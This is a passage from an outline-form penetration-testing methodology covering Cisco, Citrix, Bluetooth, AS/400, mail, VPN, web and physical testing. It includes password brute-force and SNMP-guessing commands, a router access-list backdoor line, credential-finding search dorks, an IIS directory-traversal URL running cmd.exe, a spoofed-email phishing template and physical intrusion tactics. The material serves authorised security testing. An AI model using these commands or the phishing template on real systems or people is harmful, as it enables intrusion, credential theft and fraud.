21.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
21.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
21.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
21.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
21.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
21.1.3.2. Access with Work Station Gateway
21.1.3.2.1. http://target:5061/WSG
21.1.3.2.2. Default AS/400 accounts.
21.1.3.3. Network attacks (next release)
21.1.3.3.1. DB2
21.1.3.3.2. QSHELL
21.1.3.3.3. Hijacking Terminals
21.1.3.3.4. Trojan attacks
21.1.3.3.5. Hacking from AS/400
21.2. Local
21.2.1. System Value Security
21.2.1.1. Untitled
21.2.1.1.1. Untitled
21.2.1.2. Untitled
21.2.1.2.1. Untitled
21.2.1.3. Untitled
21.2.1.3.1. Untitled
21.2.1.4. Untitled
21.2.1.4.1. Recommended value is 30
21.2.2. Password Policy
21.2.2.1. Untitled
21.2.2.1.1. Untitled
21.2.2.2. Untitled
21.2.2.2.1. Untitled
21.2.2.3. Untitled
21.2.2.3.1. Untitled
21.2.2.4. Untitled
21.2.2.4.1. Untitled
21.2.2.5. Untitled
21.2.3. Audit level
21.2.3.1. Untitled
21.2.3.1.1. Recommended value is *SECURITY
21.2.4. Documentation
21.2.4.1. Users class
21.2.4.1.1. Untitled
21.2.4.2. System Audit Settings
21.2.4.2.1. Untitled
21.2.4.3. Special Authorities Definitions
21.2.4.3.1. Untitled
22. Bluetooth Specific Testing
22.1. Bluescanner
22.2. Bluesweep
22.3. btscanner
22.4. Redfang
22.5. Blueprint
22.6. Bluesnarfer
22.7. Bluebugger
22.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
22.8. Blueserial
22.9. Bloover
22.10. Bluesniff
22.11. Exploit Frameworks
22.11.1. BlueMaho
22.11.1.1. Untitled
22.12. Resources
22.12.1. URLs
22.12.1.1. BlueStumbler.org
22.12.1.2. Bluejackq.com
22.12.1.3. Bluejacking.com
22.12.1.4. Bluejackers
22.12.1.5. bluetooth-pentest
22.12.1.6. ibluejackedyou.com
22.12.1.7. Trifinite
22.12.2. Vulnerability Information
22.12.2.1. Common Vulnerabilities and Exploits (CVE)
22.12.2.1.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
22.12.3. White Papers
22.12.3.1. Bluesnarfing
23. Cisco Specific Testing
23.1. Methodology
23.1.1. Scan & Fingerprint.
23.1.1.1. Untitled
23.1.1.2. Untitled
23.1.1.3. If SNMP is active, then community string guessing should be performed.
23.1.2. Credentials Guessing.
23.1.2.1. Untitled
23.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
23.1.3. Connect
23.1.3.1. Untitled
23.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
23.1.4. Check for bugs
23.1.4.1. Untitled
23.1.4.1.1. The most widely known/ used are: Nessus, Retina, GFI LanGuard and Core Impact.
23.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
23.1.5. Further your attack
23.1.5.1. Untitled
23.1.5.1.1. running-config is the currently running configuration. It is loaded from the startup-config on boot. This configuration is editable and changes take effect immediately, but any changes are lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network.
23.1.5.1.2. startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.
23.1.5.2. Untitled
23.1.5.2.1. #> access-list 100 permit ip <IP> any
23.2. Scan & Fingerprint.
23.2.1. Port Scanning
23.2.1.1. nmap
23.2.1.1.1. Untitled
23.2.1.2. Other tools
23.2.1.2.1. Untitled
23.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
23.2.2. Fingerprinting
23.2.2.1. Untitled
23.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
23.2.2.2. Untitled
23.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
23.2.2.2.2. Untitled
23.3. Password Guessing.
23.3.1. Untitled
23.3.1.1. ./CAT -h <IP> -a password.wordlist
23.3.1.2. Untitled
23.3.2. Untitled
23.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
23.3.2.2. Untitled
23.3.3. Untitled
23.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
23.3.3.2. Untitled
23.4. SNMP Attacks.
23.4.1. Untitled
23.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
23.4.1.2. Untitled
23.4.2. Untitled
23.4.2.1. onesixtyone -c SNMP.wordlist <IP>
23.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
23.4.3. Untitled
23.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>
23.4.3.2. Untitled
23.5. Connecting.
23.5.1. Telnet
23.5.1.1. Untitled
23.5.1.1.1. telnet <IP>
23.5.1.1.2. Sample Banners
23.5.2. SSH
23.5.3. Web Browser
23.5.3.1. Untitled
23.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
23.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:
23.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
23.5.4. TFTP
23.5.4.1. Untitled
23.5.4.1.1. Untitled
23.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
23.5.4.2. Untitled
23.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
23.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
23.5.4.2.3. Creating backdoors in Cisco IOS using TCL
23.6. Known Bugs.
23.6.1. Attack Tools
23.6.1.1. Untitled
23.6.1.1.1. Untitled
23.6.1.2. Untitled
23.6.1.2.1. Web browse to the Cisco device: http://<IP>
23.6.1.2.2. Untitled
23.6.1.2.3. Untitled
23.6.1.2.4. Untitled
23.6.1.3. Untitled
23.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
23.6.2. Common Vulnerabilities and Exploits (CVE) Information
23.6.2.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
23.7. Configuration Files.
23.7.1. Untitled
23.7.1.1. Configuration files explained
23.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access.
23.7.1.1.2. Untitled
23.7.1.1.3. Untitled
23.7.1.1.4. Password Encryption Utilised
23.7.1.1.5. Untitled
23.7.1.2. Configuration Testing Tools
23.7.1.2.1. Nipper
23.7.1.2.2. fwauto (Beta)
23.8. References.
23.8.1. Cisco IOS Exploitation Techniques
24. Citrix Specific Testing
24.1. Citrix provides remote access services to multiple users across a wide range of platforms. I have put together the following information, which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix.
24.2. Enumeration
24.2.1. web search
24.2.1.1. Google (GHDB)
24.2.1.1.1. ext:ica
24.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
24.2.1.1.3. [WFClient] Password= filetype:ica
24.2.1.1.4. inurl:citrix/metaframexp/default/login.asp?ClientDetection=On
24.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
24.2.1.1.6. inurl:/Citrix/Nfuse17/
24.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
24.2.1.2. Google Hacks (Author Discovered)
24.2.1.2.1. filetype:ica Username=
24.2.1.2.2. inurl:/Citrix/AccessPlatform/
24.2.1.2.3. inurl:LogonAgent/Login.asp
24.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp
24.2.1.2.5. inurl:/Citrix/NFuse161/login.asp
24.2.1.2.6. inurl:/Citrix/NFuse16
24.2.1.2.7. inurl:/Citrix/NFuse151/
24.2.1.2.8. allintitle:MetaFrame XP Login
24.2.1.2.9. allintitle:MetaFrame Presentation Server Login
24.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
24.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login
24.2.1.3. Yahoo
24.2.1.3.1. originurlextension:ica
24.2.2. site search
24.2.2.1. Manual
24.2.2.1.1. review web page for useful information
24.2.2.1.2. review source for web page
24.2.3. generic
24.2.3.1. nmap -A -PN -p 80,443,1494 ip_address
24.2.3.2. amap -bqv ip_address port_no.
24.2.4. citrix specific
24.2.4.1. enum.pl
24.2.4.1.1. perl enum.pl ip_address
24.2.4.2. enum.js
24.2.4.2.1. enum.js apps TCPBrowserAddress=ip_address
24.2.4.3. connect.js
24.2.4.3.1. connect.js TCPBrowserAddress=ip_address Application=advertised-application
24.2.4.4. Citrix-pa-scan
24.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
24.2.4.5. pabrute.c
24.2.4.5.1. ./pabrute pubapp list app_list ip_address
24.2.5. Default Ports
24.2.5.1. TCP
24.2.5.1.1. Citrix XML Service
24.2.5.1.2. Advanced Management Console
24.2.5.1.3. Citrix SSL Relay
24.2.5.1.4. ICA sessions
24.2.5.1.5. Server to server
24.2.5.1.6. Management Console to server
24.2.5.1.7. Session Reliability (Auto-reconnect)
24.2.5.1.8. License Management Console
24.2.5.1.9. License server
24.2.5.2. UDP
24.2.5.2.1. Clients to ICA browser service
24.2.5.2.2. Server-to-server
24.2.6. nmap nse scripts
24.2.6.1. citrix-enum-apps
24.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
24.2.6.2. citrix-enum-apps-xml
24.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
24.2.6.3. citrix-enum-servers
24.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604
24.2.6.4. citrix-enum-servers-xml
24.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
24.2.6.5. citrix-brute-xml
24.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
24.3. Scanning
24.3.1. Nessus
24.3.1.1. Plugins
24.3.1.1.1. CGI abuses
24.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
24.3.1.1.3. Misc.
24.3.1.1.4. Service Detection
24.3.1.1.5. Web Servers
24.3.1.1.6. Windows
24.3.2. Nikto
24.3.2.1. perl nikto.pl -host ip_address -port port_no.
24.3.2.1.1. Untitled
24.4. Exploitation
24.4.1. Alter default .ica files
24.4.1.1. InitialProgram=cmd.exe
24.4.1.2. InitialProgram=explorer.exe
24.4.2. Enumerate and Connect
24.4.2.1. For applications identified by Citrix-pa-scan
24.4.2.1.1. Pas
24.4.2.2. For published applications with a Citrix client when the master browser is non-public.
24.4.2.2.1. Citrix-pa-proxy
24.5. Brute Force
24.5.1. bforce.js
24.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
24.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
24.5.1.3. Untitled
24.6. Review Configuration Files
24.6.1. Application server configuration file
24.6.1.1. appsrv.ini
24.6.1.1.1. Location
24.6.1.1.2. World writeable
24.6.1.1.3. Review other files
24.6.1.1.4. Sample file
24.6.2. Program Neighborhood configuration file
24.6.2.1. pn.ini
24.6.2.1.1. Location
24.6.2.1.2. Review other files
24.6.2.1.3. Sample file
24.6.3. Citrix ICA client configuration file
24.6.3.1. wfclient.ini
24.6.3.1.1. Location
24.7. References
24.7.1. Vulnerabilities
24.7.1.1. Art of Hacking
24.7.1.2. Common Vulnerabilities and Exploits (CVE)
24.7.1.2.1. Sample file
24.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
24.7.1.3. OSVDB
24.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=search
24.7.1.4. Secunia
24.7.1.5. Security-database.com
24.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
24.7.1.6. SecurityFocus
24.7.2. Support
24.7.2.1. Citrix
24.7.2.1.1. Knowledge Base
24.7.2.2. Thinworld
24.7.3. Exploits
24.7.3.1. Milw0rm
24.7.3.1.1. http://www.milw0rm.com/search.php
24.7.3.2. Art of Hacking
24.7.3.2.1. Citrix
24.7.4. Tools Resource
24.7.4.1. Zip file containing the majority of the tools mentioned in this article, for easy download/access
25. Network Backbone
25.1. Generic Toolset
25.1.1. Wireshark (Formerly Ethereal)
25.1.1.1. Passive Sniffing
25.1.1.1.1. Usernames/Passwords
25.1.1.1.2. Email
25.1.1.1.3. FTP
25.1.1.1.4. HTTP
25.1.1.1.5. HTTPS
25.1.1.1.6. RDP
25.1.1.1.7. VOIP
25.1.1.1.8. Other
25.1.1.2. Filters
25.1.1.2.1. ip.src == ip_address
25.1.1.2.2. ip.dst == ip_address
25.1.1.2.3. tcp.dstport == port_no.
25.1.1.2.4. ! ip.addr == ip_address
25.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
25.1.2. Cain & Abel
25.1.2.1. Active Sniffing
25.1.2.1.1. ARP Cache Poisoning
25.1.2.1.2. DNS Poisoning
25.1.2.1.3. Routing Protocols
25.1.3. Cisco-Torch
25.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
25.1.4. NTP-Fingerprint
25.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
25.1.5. Yersinia
25.1.6. p0f
25.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
25.1.7. Manual Check (Credentials required)
25.1.8. MAC Spoofing
25.1.8.1. mac address changer for windows
25.1.8.2. macchanger
25.1.8.2.1. Random Mac Address:- macchanger -r eth0
25.1.8.3. madmacs
25.1.8.4. smac
25.1.8.5. TMAC
26. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system being attacked. Exploits can be compiled and used manually, or various engines exist that are, at the lowest level, essentially pre-compiled point-and-shoot tools. These engines also have a number of extra underlying features for more advanced users.
26.1. Password Attacks
26.1.1. Known Accounts
26.1.1.1. Identified Passwords
26.1.1.2. Unidentified Hashes
26.1.2. Default Accounts
26.1.2.1. Identified Passwords
26.1.2.2. Unidentified Hashes
26.2. Exploits
26.2.1. Successful Exploits
26.2.1.1. Accounts
26.2.1.1.1. Passwords
26.2.1.1.2. Groups
26.2.1.1.3. Other Details
26.2.1.2. Services
26.2.1.3. Backdoor
26.2.1.4. Connectivity
26.2.2. Unsuccessful Exploits
26.2.3. Resources
26.2.3.1. Securiteam
26.2.3.1.1. Exploits are sorted by year and must be downloaded individually
26.2.3.2. SecurityForest
26.2.3.2.1. Updated via CVS after initial install
26.2.3.3. GovernmentSecurity
26.2.3.3.1. Need to create an account to obtain access
26.2.3.4. Red Base Security
26.2.3.4.1. Oracle Exploit site only
26.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
26.2.3.5.1. Wireless Exploit Site
26.2.3.6. PacketStorm Security
26.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
26.2.3.7. SecWatch
26.2.3.7.1. Exploits sorted by year and month, downloaded separately
26.2.3.8. SecurityFocus
26.2.3.8.1. Exploits must be downloaded individually
26.2.3.9. Metasploit
26.2.3.9.1. Install and regularly update via svn
26.2.3.10. Milw0rm
26.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!
26.3. Tools
26.3.1. Metasploit
26.3.1.1. Free Extra Modules
26.3.1.1.1. local copy
26.3.2. Manual SQL Injection
26.3.2.1. Understanding SQL Injection
26.3.2.2. SQL Injection walkthrough
26.3.2.3. SQL Injection by example
26.3.2.4. Blind SQL Injection
26.3.2.5. Advanced SQL Injection in SQL Server
26.3.2.6. More Advanced SQL Injection
26.3.2.7. Advanced SQL Injection in Oracle databases
26.3.2.8. SQL Cheatsheets
26.3.3. SQL Power Injector
26.3.4. SecurityForest
26.3.5. SPI Dynamics WebInspect
26.3.6. Core Impact
26.3.7. Cisco Global Exploiter
26.3.8. PIXDos
26.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]
26.3.9. CANVAS
26.3.10. Inguma
27. Server Specific Tests
27.1. Databases
27.1.1. Direct Access Interrogation
27.1.1.1. MS SQL Server
27.1.1.1.1. Ports
27.1.1.1.2. Version
27.1.1.1.3. osql
27.1.1.2. Oracle
27.1.1.2.1. Ports
27.1.1.2.2. TNS Listener
27.1.1.2.3. SQL Plus
27.1.1.2.4. Default Account/Passwords
27.1.1.2.5. Default SIDs
27.1.1.3. MySQL
27.1.1.3.1. Ports
27.1.1.3.2. Version
27.1.1.3.3. Users/Passwords
27.1.1.4. DB2
27.1.1.5. Informix
27.1.1.6. Sybase
27.1.1.7. Other
27.1.2. Scans
27.1.2.1. Default Ports
27.1.2.2. Non-Default Ports
27.1.2.3. Instance Names
27.1.2.4. Versions
27.1.3. Password Attacks
27.1.3.1. Sniffed Passwords
27.1.3.1.1. Cracked Passwords
27.1.3.1.2. Hashes
27.1.3.2. Direct Access Guesses
27.1.4. Vulnerability Assessment
27.1.4.1. Automated
27.1.4.1.1. Reports
27.1.4.1.2. Vulnerabilities
27.1.4.2. Manual
27.1.4.2.1. Patch Levels
27.1.4.2.2. Confirmed Vulnerabilities
27.2. Mail
27.2.1. Scans
27.2.2. Fingerprint
27.2.2.1. Manual
27.2.2.2. Automated
27.2.3. Spoofable
27.2.3.1. Telnet spoof
27.2.3.1.1. telnet target_IP 25
helo target.com
mail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]
X-Originating-Email: [[email protected]]
MIME-Version: 1.0
To: <[email protected]>
From: < [email protected] >
Subject: Important! Account check required
Content-Type: text/html
Content-Transfer-Encoding: 7bit

Dear Valued Customer,
The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.
Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>
Online Security Manager.
Target [email protected].
27.2.4. Relays
27.3. VPN
27.3.1. Scanning
27.3.1.1. 500 UDP IPSEC
27.3.1.2. 1723 TCP PPTP
27.3.1.3. 443 TCP/SSL
27.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
27.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
27.3.2. Fingerprinting
27.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
27.3.3. PSK Crack
27.3.3.1. ikeprobe 80.75.68.27
27.3.3.2. sniff for responses with C&A or ikecrack
27.4. Web
27.4.1. Vulnerability Assessment
27.4.1.1. Automated
27.4.1.1.1. Reports
27.4.1.1.2. Vulnerabilities
27.4.1.2. Manual
27.4.1.2.1. Patch Levels
27.4.1.2.2. Confirmed Vulnerabilities
27.4.2. Permissions
27.4.2.1. PUT /test.txt HTTP/1.0
27.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
27.4.2.3. POST http://mail.another.com:25/ HTTP/1.0
Content-Type: text/plain
Content-Length: 6
27.4.3. Scans
27.4.4. Fingerprinting
27.4.4.1. Other
27.4.4.2. HTTP
27.4.4.2.1. Commands
27.4.4.2.2. Modules
27.4.4.2.3. File Extensions
27.4.4.3. HTTPS
27.4.4.3.1. Commands
27.4.4.3.2. Commands
27.4.4.3.3. File Extensions
27.4.5. Directory Traversal
27.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
28. Physical Security
28.1. Building Security
28.1.1. Meeting Rooms
28.1.1.1. Check for active network jacks.
28.1.1.2. Check for any information in room.
28.1.2. Lobby
28.1.2.1. Check for active network jacks.
28.1.2.2. Does receptionist/guard leave lobby?
28.1.2.3. Accessible printers? Print test page.
28.1.2.4. Obtain phone/personnel listing.
28.1.3. Communal Areas
28.1.3.1. Check for active network jacks.
28.1.3.2. Check for any information in room.
28.1.3.3. Listen for employee conversations.
28.1.4. Room Security
28.1.4.1. Resistance of lock to picking.
28.1.4.1.1. What type of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?
28.1.4.2. Ceiling access areas.
28.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
28.1.5. Windows
28.1.5.1. Check windows/doors for visible intruder alarm sensors.
28.1.5.2. Check visible areas for sensitive information.
28.1.5.3. Can you video users logging on?
28.2. Perimeter Security
28.2.1. Fence Security
28.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
28.2.2. Exterior Doors
28.2.2.1. If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.
28.2.3. Guards
28.2.3.1. Patrol Routines
28.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
28.2.3.2. Communications
28.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.
28.3. Entry Points
28.3.1. Guarded Doors
28.3.1.1. Piggybacking
28.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.
28.3.1.2. Fake ID
28.3.1.2.1. Attempt to use fake ID to gain access.
28.3.1.3. Access Methods
28.3.1.3.1. Test 'out of hours' entry methods
28.3.2. Unguarded Doors
28.3.2.1. Identify all unguarded entry points.
28.3.2.1.1. Are doors secured?
28.3.2.1.2. Check locks for resistance to lock picking.
28.3.3. Windows
28.3.3.1. Check windows/doors for visible intruder alarm sensors.
28.3.3.1.1. Attempt to bypass sensors.
28.4. Office Waste
28.4.1. Dumpster Diving - Attempt to retrieve any useful information from ToE refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs etc.
29. Final Report - template
30. Contributors
30.1. Matt Byrne (WirelessDefence.org)
30.1.1. Matt contributed the majority of the Wireless section.
30.2. Arvind Doraiswamy (Paladion.net)
30.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.
30.3. Lee Lawson (Dns.co.uk)
30.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.